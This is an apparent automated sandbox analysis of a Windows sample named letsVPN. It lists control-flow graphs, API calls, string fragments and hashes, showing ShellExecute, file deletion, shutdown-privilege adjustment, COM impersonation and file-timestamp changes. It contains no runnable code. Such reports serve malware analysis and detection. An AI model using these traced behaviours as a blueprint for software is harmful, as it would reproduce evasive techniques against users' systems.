17640->17644 17642 180016cfc _invalid_parameter_noinfo 2 API calls 17641->17642 17643 1800243bf 17642->17643 17643->17601 17644->17643 17646 18001ee74 LeaveCriticalSection 17644->17646 17648 180015507 17647->17648 17649 1800154f7 17647->17649 17654 18001551a 17648->17654 17659 18001de34 17648->17659 17650 180015dc8 _errno 3 API calls 17649->17650 17653 1800154fc 17650->17653 17653->17585 17685 18000ee28 17654->17685 17660 18001de56 17659->17660 17661 18001de75 17660->17661 17662 18001de8d 17660->17662 17663 180015dc8 _errno 3 API calls 17661->17663 17664 180016d58 _fileno 5 API calls 17662->17664 17665 18001de7a 17663->17665 17666 18001de92 17664->17666 17667 180016cfc _invalid_parameter_noinfo 2 API calls 17665->17667 17668 18001e148 _lseek 11 API calls 17666->17668 17684 18001de85 17667->17684 17669 18001deaa 17668->17669 17672 18001e023 17669->17672 17673 18001df05 17669->17673 17669->17684 17670 180012200 std::system_error::system_error IsProcessorFeaturePresent 17671 18001e124 17670->17671 17671->17654 17674 18001e027 17672->17674 17678 18001dff9 17672->17678 17676 18001df1a 17673->17676 17673->17678 17675 180015dc8 _errno 3 API calls 17674->17675 17675->17684 17676->17684 17715 1800182cc 17676->17715 17679 18001e148 _lseek 11 API calls 17678->17679 17678->17684 17680 18001e06d 17679->17680 17681 18001e148 _lseek 11 API calls 17680->17681 17680->17684 17681->17684 17682 18001df36 _read_nolock 17683 18001e148 _lseek 11 API calls 17682->17683 17682->17684 17683->17684 17684->17670 17686 18000ee6a 17685->17686 17687 18000ee45 17685->17687 17691 180016d58 17686->17691 17687->17686 17688 180016d58 _fileno 5 API calls 17687->17688 17689 18000ee5c 17688->17689 17761 180017010 17689->17761 17692 180016d61 17691->17692 17693 180015552 17691->17693 17694 180015dc8 _errno 3 API calls 17692->17694 17697 18001e148 17693->17697 17695 180016d66 17694->17695 17696 180016cfc _invalid_parameter_noinfo 2 API calls 17695->17696 17696->17693 17698 18001e183 17697->17698 17699 
18001e16b 17697->17699 17700 18001e1fc 17698->17700 17702 18001e1b6 17698->17702 17701 180015dc8 _errno 3 API calls 17699->17701 17704 180015dc8 _errno 3 API calls 17700->17704 17710 18001e178 17701->17710 17703 18001ea14 __lock_fhandle 2 API calls 17702->17703 17705 18001e1bd 17703->17705 17706 18001e209 17704->17706 17707 18001e1ca 17705->17707 17708 18001e1db 17705->17708 17709 180016cfc _invalid_parameter_noinfo 2 API calls 17706->17709 17777 18001e22c 17707->17777 17712 180015dc8 _errno 3 API calls 17708->17712 17709->17710 17710->17653 17713 18001e1d7 17712->17713 17790 18001ee74 LeaveCriticalSection 17713->17790 17716 1800182ef 17715->17716 17718 180018307 17715->17718 17720 180015dc8 _errno 3 API calls 17716->17720 17717 180018383 17721 180015dc8 _errno 3 API calls 17717->17721 17718->17717 17719 18001833a 17718->17719 17733 18001ea14 17719->17733 17732 1800182fc 17720->17732 17723 180018390 17721->17723 17725 180016cfc _invalid_parameter_noinfo 2 API calls 17723->17725 17724 180018341 17726 18001834e 17724->17726 17727 180018360 17724->17727 17725->17732 17738 1800183b4 17726->17738 17729 180015dc8 _errno 3 API calls 17727->17729 17730 18001835b 17729->17730 17747 18001ee74 LeaveCriticalSection 17730->17747 17732->17682 17734 18001ea80 EnterCriticalSection 17733->17734 17736 18001ea4c 17733->17736 17734->17724 17735 18001ea72 17735->17734 17736->17735 17737 180015828 _ioinit InitializeCriticalSectionAndSpinCount 17736->17737 17737->17735 17748 18001ed50 17738->17748 17741 1800183ea SetFilePointerEx 17743 180018402 _read_nolock 17741->17743 17745 1800183de 17741->17745 17742 1800183d9 17744 180015dc8 _errno 3 API calls 17742->17744 17756 180015d78 17743->17756 17744->17745 17745->17730 17749 18001ed59 17748->17749 17751 18001ed6e 17748->17751 17750 180015dc8 _errno 3 API calls 17749->17750 17752 1800183d3 17750->17752 17751->17752 17753 180015dc8 _errno 3 API calls 17751->17753 17752->17741 17752->17742 17754 18001edb0 17753->17754 17755 180016cfc 
_invalid_parameter_noinfo 2 API calls 17754->17755 17755->17752 17757 18001a380 _getptd_noexit 3 API calls 17756->17757 17758 180015d89 17757->17758 17759 18001a380 _getptd_noexit 3 API calls 17758->17759 17760 180015da2 _dosmaperr 17759->17760 17760->17745 17762 180017033 17761->17762 17763 18001704b 17761->17763 17765 180015dc8 _errno 3 API calls 17762->17765 17764 1800170c4 17763->17764 17766 18001707e 17763->17766 17768 180015dc8 _errno 3 API calls 17764->17768 17767 180017040 17765->17767 17769 18001ea14 __lock_fhandle 2 API calls 17766->17769 17767->17686 17770 1800170d1 17768->17770 17771 180017085 17769->17771 17772 180016cfc _invalid_parameter_noinfo 2 API calls 17770->17772 17773 180015dc8 _errno 3 API calls 17771->17773 17774 180017092 17771->17774 17772->17767 17773->17774 17776 18001ee74 LeaveCriticalSection 17774->17776 17778 18001ed50 _get_osfhandle 5 API calls 17777->17778 17779 18001e250 17778->17779 17780 18001e259 17779->17780 17781 18001e26c SetFilePointerEx 17779->17781 17783 180015dc8 _errno 3 API calls 17780->17783 17782 18001e295 SetFilePointerEx 17781->17782 17784 18001e286 _read_nolock 17781->17784 17782->17784 17785 18001e2ad 17782->17785 17787 18001e25e 17783->17787 17788 180015d78 _dosmaperr 3 API calls 17784->17788 17786 18001e2b4 SetFilePointerEx 17785->17786 17785->17787 17789 180015dc8 _errno 3 API calls 17786->17789 17787->17713 17788->17787 17789->17787 17792 180001dc6 17791->17792 17793 180004420 17791->17793 17792->17554 17792->17558 17793->17792 17794 18000eb24 std::ios_base::_Init 6 API calls 17793->17794 17796 18000442d 17794->17796 17795 180004465 17795->17792 17798 180002a5c ctype 16 API calls 17795->17798 17796->17795 17797 18000234c std::_Locinfo::_Locinfo 18 API calls 17796->17797 17797->17795 17798->17792 17800 18000265e std::system_error::system_error 17799->17800 17813 18000547c 17800->17813 17802 180002676 17820 1800023f8 17802->17820 17804 180002692 17805 180012200 std::system_error::system_error 
IsProcessorFeaturePresent 17804->17805 17806 1800026bf 17805->17806 17806->17004 17810 18000428f _ld12tod 17807->17810 17812 1800042a9 17807->17812 17808 180012200 std::system_error::system_error IsProcessorFeaturePresent 17809 1800043d2 17808->17809 17809->17012 17810->17812 17855 18000f688 17810->17855 17812->17808 17814 1800054e5 17813->17814 17816 180005499 17813->17816 17829 180004594 17814->17829 17816->17814 17817 1800054c0 17816->17817 17818 180005394 std::_System_error::_System_error 8 API calls 17817->17818 17819 1800054e3 memcpy_s 17818->17819 17819->17802 17821 180005394 std::_System_error::_System_error 8 API calls 17820->17821 17822 180002449 17821->17822 17851 180004b50 17822->17851 17825 180011798 std::exception::exception 5 API calls 17826 18000247d 17825->17826 17827 180012200 std::system_error::system_error IsProcessorFeaturePresent 17826->17827 17828 1800024b8 17827->17828 17828->17804 17830 180004651 17829->17830 17832 1800045bd 17829->17832 17842 18000e104 17830->17842 17835 1800045ce memcpy_s 17832->17835 17836 180004024 17832->17836 17835->17819 17837 18000405d 17836->17837 17838 1800040aa 17837->17838 17839 18000eb24 std::ios_base::_Init 6 API calls 17837->17839 17841 1800040b7 memcpy_s 17837->17841 17838->17841 17847 18000e0c0 17838->17847 17839->17838 17841->17835 17843 180011798 std::exception::exception 5 API calls 17842->17843 17844 18000e11c 17843->17844 17845 180011998 _CxxThrowException 2 API calls 17844->17845 17846 18000e139 17845->17846 17848 18000e0e5 std::_Xbad_alloc 17847->17848 17849 180011998 _CxxThrowException 2 API calls 17848->17849 17850 18000e102 17849->17850 17852 180004b8a std::system_error::system_error std::_System_error::_System_error 17851->17852 17853 180012200 std::system_error::system_error IsProcessorFeaturePresent 17852->17853 17854 180002462 17853->17854 17854->17825 17856 18000f6b2 17855->17856 17863 18000f6d3 17855->17863 17857 18000f6c3 17856->17857 17858 18000f6d5 17856->17858 17856->17863 17859 

Control-flow Graph (first node: 18000583a)

Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: AddressLibraryLoadProcSleep$CreateDeleteDirectoryExecuteFileShell
• String ID: 255$ sta$.0.0$1.0.$Dele$Shel$cute$lExe$leW$teFi$tic $~16
• API String ID: 1872526433-501238091
• Opcode ID: 2de8ca2edf32e5d592ad1db038b95d3c579e97f9fa53fb0bd541c60e535d2964
• Instruction ID: c9c4ca4ab1ae5be6749216688ddcecd4b28c08cb2a744ea5c2d942ebc46c746f
• Opcode Fuzzy Hash: 2de8ca2edf32e5d592ad1db038b95d3c579e97f9fa53fb0bd541c60e535d2964
• Instruction Fuzzy Hash: 73920572211BC88AE7B2DF20DC947DD33A5F74938CF809125EA495BAAADF718748C744

Control-flow Graph (first node: 1800057cd)

Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: ByteCharMultiWide$FolderFromListLocationPathSpecial
• String ID: 1.0.$Dele$Shel$cute$lExe$leW$teFi$~16
• API String ID: 790480582-1993818955
• Opcode ID: ac54990aac95bf2d28a7a146e9c6009a6d1eeca20118406b1ef1424830b8656c
• Instruction ID: be1e63a572210f39efd37311244dc54493d0b04b1b8e40341aa798d8d538536b
• Opcode Fuzzy Hash: ac54990aac95bf2d28a7a146e9c6009a6d1eeca20118406b1ef1424830b8656c
• Instruction Fuzzy Hash: 37821872211BC88AE7B2DF20DC947DD33A5F74938CF809125EA494BAAADF758748C744

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 794 18000310c-1800031de CoInitialize CoImpersonateClient CoInitializeSecurity call 1800113f0 call 18000547c call 180003754 801 1800031e3-1800031f8 call 180002f78 794->801 802 1800031e0 794->802 805 1800031fa 801->805 806 1800031fd-18000320e CLSIDFromProgID 801->806 802->801 805->806 807 180003219-180003230 806->807 808 180003210-180003214 call 18000eaf0 806->808 810 180003232-180003236 call 18000eaf0 807->810 811 18000323b-180003263 CoCreateInstance 807->811 808->807 810->811 812 180003269-1800032b5 VariantInit call 1800113f0 call 18000547c call 180003754 811->812 813 1800036aa-1800036b9 CoUninitialize 811->813 838 1800032b7 812->838 839 1800032ba-1800032ca call 180002f78 812->839 816 1800036c2-1800036c6 813->816 817 1800036bb-1800036c1 813->817 819 1800036c8-1800036cb call 18000eaf0 816->819 820 1800036d0-1800036e1 816->820 817->816 819->820 824 1800036e3-1800036e7 call 18000eaf0 820->824 825 1800036ec-1800036ff 820->825 824->825 828 180003701-180003704 call 18000eaf0 825->828 829 180003709-180003719 825->829 828->829 832 180003723 829->832 833 18000371b-18000371e call 18000eaf0 829->833 835 180003727-180003751 call 180012200 832->835 833->832 838->839 843 1800032cc 839->843 844 1800032cf-1800032f9 839->844 843->844 845 180003303-180003307 844->845 846 180003309-18000331b call 180003ad0 845->846 847 18000331d-180003321 845->847 846->847 849 180003323-180003327 call 18000eaf0 847->849 850 18000332c-180003342 847->850 849->850 853 180003344-180003348 call 18000eaf0 850->853 854 18000334d-18000334f 850->854 853->854 856 180003351-180003359 854->856 857 18000337a-18000338b 854->857 860 180003362-180003366 856->860 861 18000335b-180003361 856->861 858 180003397-1800033e3 VariantInit call 1800113f0 call 18000547c call 180003754 857->858 859 
18000338d-180003396 857->859 873 1800033e5 858->873 874 1800033e8-1800033f8 call 180002f78 858->874 859->858 863 180003368-18000336b call 18000eaf0 860->863 864 180003370-180003375 860->864 861->860 863->864 864->820 873->874 877 1800033fa 874->877 878 1800033fd-180003433 874->878 877->878 880 180003435-180003445 call 180003ad0 878->880 881 180003447-18000344c 878->881 880->881 883 180003457-18000346d 881->883 884 18000344e-180003452 call 18000eaf0 881->884 887 180003478-18000347a 883->887 888 18000346f-180003473 call 18000eaf0 883->888 884->883 890 18000350f-180003520 887->890 891 180003480-180003492 887->891 888->887 892 180003522-18000352b 890->892 893 18000352c-180003535 890->893 896 180003494-18000349a 891->896 897 18000349b-1800034a4 891->897 892->893 895 180003538-18000354d VariantInit 893->895 895->895 899 18000354f-180003556 895->899 896->897 900 1800034a6-1800034a9 call 18000eaf0 897->900 901 1800034ae-1800034c4 897->901 902 180003558-18000355b 899->902 903 18000355d 899->903 900->901 906 1800034c6-1800034ca call 18000eaf0 901->906 907 1800034cf-1800034e2 901->907 908 180003560-18000356f SysAllocString 902->908 903->908 906->907 910 1800034e4-1800034e7 call 18000eaf0 907->910 911 1800034ec-1800034fc 907->911 912 180003571-180003575 908->912 913 180003577 908->913 910->911 916 180003506-18000350a 911->916 917 1800034fe-180003501 call 18000eaf0 911->917 915 18000357a-180003588 SysAllocString 912->915 913->915 919 18000358a-18000358d 915->919 920 18000358f 915->920 916->835 917->916 921 180003592-1800035a0 SysAllocString 919->921 920->921 922 1800035a2-1800035a5 921->922 923 1800035a7 921->923 924 1800035aa-1800035fc SysAllocString call 1800113f0 call 18000547c call 180003754 922->924 923->924 931 180003601-180003611 call 180002f78 924->931 932 1800035fe 924->932 935 180003613 931->935 936 180003616-18000363b call 180003c44 931->936 932->931 935->936 939 180003646-18000365c 936->939 940 18000363d-180003641 call 18000eaf0 936->940 942 180003667-18000366b 
939->942 943 18000365e-180003662 call 18000eaf0 939->943 940->939 945 180003670-180003680 VariantClear 942->945 943->942 945->945 946 180003682-18000368d 945->946 947 180003699-1800036a7 946->947 948 18000368f-180003698 946->948 947->813 948->947
APIs
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: AllocStringVariant$Init$Initialize$ClearClientCreateFromImpersonateInstanceProgSecurityUninitialize
• String ID:
• API String ID: 3828289656-0
• Opcode ID: 88380749b9bff7f02a8bd9b5a1ef2fd6c32f40a06c4a83a00ea0faaacdf54457
• Instruction ID: 8df9d348843d8f77737215da8969992bce2adc21e39d041bec8d82088d120d47
• Opcode Fuzzy Hash: 88380749b9bff7f02a8bd9b5a1ef2fd6c32f40a06c4a83a00ea0faaacdf54457
• Instruction Fuzzy Hash: A4126C32204B4885EB52DF61E8893DE77B8F789BC8F418025EE4A57BA5DF74C658C380

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesSleepValue_beginthreadex
• String ID: SeShutdownPrivilege
• API String ID: 1138004472-3733053543
• Opcode ID: d8da6024658c722b646910c3d96e45045ea0514b14bdfe8c575e50fea09f0569
• Instruction ID: 7900f27b0b5eabe5c36217b302caede7b5b8c6614703a535c2948af9343980a6
• Opcode Fuzzy Hash: d8da6024658c722b646910c3d96e45045ea0514b14bdfe8c575e50fea09f0569
• Instruction Fuzzy Hash: 41313C72B10B098AF792CFB1D8453ED37B4F74C79DF048426EA0AA6658DF78C2498750

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: GlobalInfoMemoryStatusSystem
• String ID: @
• API String ID: 248183744-2766056989
• Opcode ID: 6ab1be835e954898ebdeb28ed991f5560ea1e6b52a6b1bd78a8faee3408ec2ef
• Instruction ID: 831fc52dc961fc22b003951347bb0d9f027577d0a48d1bea24d334a4d92bd93f
• Opcode Fuzzy Hash: 6ab1be835e954898ebdeb28ed991f5560ea1e6b52a6b1bd78a8faee3408ec2ef
• Instruction Fuzzy Hash: C6F01236618A8487FBA1DB60E4663AEB361F7CD794F814515E68E41A55DF7CC21CCB00

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: File$Pointer$Create
• String ID:
• API String ID: 250661774-0
• Opcode ID: 58049fbec35e7c4634dedcbb9b83f674b4bc32b06552d7332aa69889d7d14782
• Instruction ID: fc990ef4cf880642924757aab6ab0feee7337a1683e05dbc252286eedef122ed
• Opcode Fuzzy Hash: 58049fbec35e7c4634dedcbb9b83f674b4bc32b06552d7332aa69889d7d14782
• Instruction Fuzzy Hash: E631F6336187588AE362CF26A440B9E7FA1F388BD0F658215EF5503B90DF39C649C741

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 51f9b2731b5c0c3c81ca969c26c7ffe3da710bf57b20caf7dcc85b9a83dc375f
• Instruction ID: 2bc004255d4dc64879280be8e809554ba150f91c78f1042ec411c1203a364a17
• Opcode Fuzzy Hash: 51f9b2731b5c0c3c81ca969c26c7ffe3da710bf57b20caf7dcc85b9a83dc375f
• Instruction Fuzzy Hash: 4CE1C633B10A5846FBA7CA78C4943EC27A1A749BE8F14C215FE2A5B7D5CE78C649C701

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
Similarity
• API ID: lstrcat$DeleteExecuteFileFolderPathShellSleepSpecialwsprintf
• String ID: /F $ /d 0$ /t $ /v $@$p
• API String ID: 2901320441-719673316
• Opcode ID: e57dd66678158338e5c2a573c4aa2a2db4ed1e9dcfa8cee3a4322f6ea663ef52
• Instruction ID: 651b5840f91052aa65d2ad8009e727a2fa45a5703b0bebf71695ec9b55f461a3
• Opcode Fuzzy Hash: e57dd66678158338e5c2a573c4aa2a2db4ed1e9dcfa8cee3a4322f6ea663ef52
• Instruction Fuzzy Hash: F5420772211AC4DDE761DF61DC883CD37A5F74978CF40811AEA095BAAACFB58788C744

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    [Control-flow graph not reproduced; named API calls in the graph: wsprintfW, CreateFileW, SetFileTime]
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %s%s$%s%s%s$:
                                                                                                                                                                                                    • API String ID: 0-3034790606
                                                                                                                                                                                                    • Opcode ID: 755bd59cc5d153306aa08bcc3e5d8fccac77097dabe209a2a7d026265034d99e
                                                                                                                                                                                                    • Instruction ID: 14882d1e0d26957d55fa102c130c097a1d26e38a24c7715c8a635e70eca5937d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 755bd59cc5d153306aa08bcc3e5d8fccac77097dabe209a2a7d026265034d99e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B816E36208A8986FBA6DB2494483EE33A0F74E7D4F84C112FA5A476D5DF75C75E8301

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    [Control-flow graph not reproduced; named API calls in the graph: GetFileType]
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileHandleLast_dosmaperr_errno$AddressCloseModuleProcType__create
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4140100140-0
                                                                                                                                                                                                    • Opcode ID: ffdb133339664abdd8ccab489f9dadf0c4f1ff9df1a60f4f4e72272a7c8ce013
                                                                                                                                                                                                    • Instruction ID: 21a8e73e1044da5ed91c5e9c3d813a1c520d1f5f3831f37e1cb40251bc97187f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffdb133339664abdd8ccab489f9dadf0c4f1ff9df1a60f4f4e72272a7c8ce013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69217137715A0886EB93DBA4E4953ED3360B78ABA8F508615F96A9B7D5CF38C5088700

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    [Control-flow graph not reproduced; named API calls in the graph: PathFileExistsW, CreateFileW]
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$ByteCharCloseCreateHandleMultiWide$ExistsPathWrite
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3442908436-0
                                                                                                                                                                                                    • Opcode ID: 01b85ae5def2a88f84cc05a2640d443a8e322579959ccafa2097096b93ef9b92
                                                                                                                                                                                                    • Instruction ID: bc84bb0ade42bd10d81e598d42a7d6411edb22724f2ff8f25fe5d380946b77e8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01b85ae5def2a88f84cc05a2640d443a8e322579959ccafa2097096b93ef9b92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53316072614B4847FBA5DF15A44879A7791F79DBF4F048324BAAA07AD5CF7CC2088B04

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_callnewh$AllocHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2989141601-0
                                                                                                                                                                                                    • Opcode ID: 6b211e8c4aa0329ed6c19c12349e77cbd62d674226e7b8a8873c600e5df7cac6
                                                                                                                                                                                                    • Instruction ID: 2ba802d8fde8188c932a9ee185128103f4f97c31fd93188f9c8e6f85ebd482bd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b211e8c4aa0329ed6c19c12349e77cbd62d674226e7b8a8873c600e5df7cac6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF118230601F8C86FBE7A7A1A5917E86651AB8CBF0F04C620BA15067C2EE7886988710

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$CloseCodeExitHandleObjectProcessSingleWait_dosmaperr_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4283748043-0

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1255 180009aca-180009ad3 GetFileAttributesW 1256 180009ad5-180009ada CreateDirectoryW 1255->1256 1257 180009ae0-180009ae6 1255->1257 1256->1257 1258 180009b91-180009bb3 call 180012200 1257->1258 1259 180009aec-180009aef 1257->1259 1261 180009af2-180009b0b 1259->1261 1265 180009b0d-180009b10 1261->1265 1266 180009b12-180009b36 call 180010400 1265->1266 1267 180009b50-180009b58 1265->1267 1266->1267 1274 180009bb4 call 180012780 1266->1274 1268 180009b67-180009b82 call 180012830 GetFileAttributesW 1267->1268 1269 180009b5a-180009b62 call 18001285c 1267->1269 1268->1258 1276 180009b84-180009b8b CreateDirectoryW 1268->1276 1269->1268 1276->1258
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesCreateDirectoryFile$wcscatwcscpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4269979241-0

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
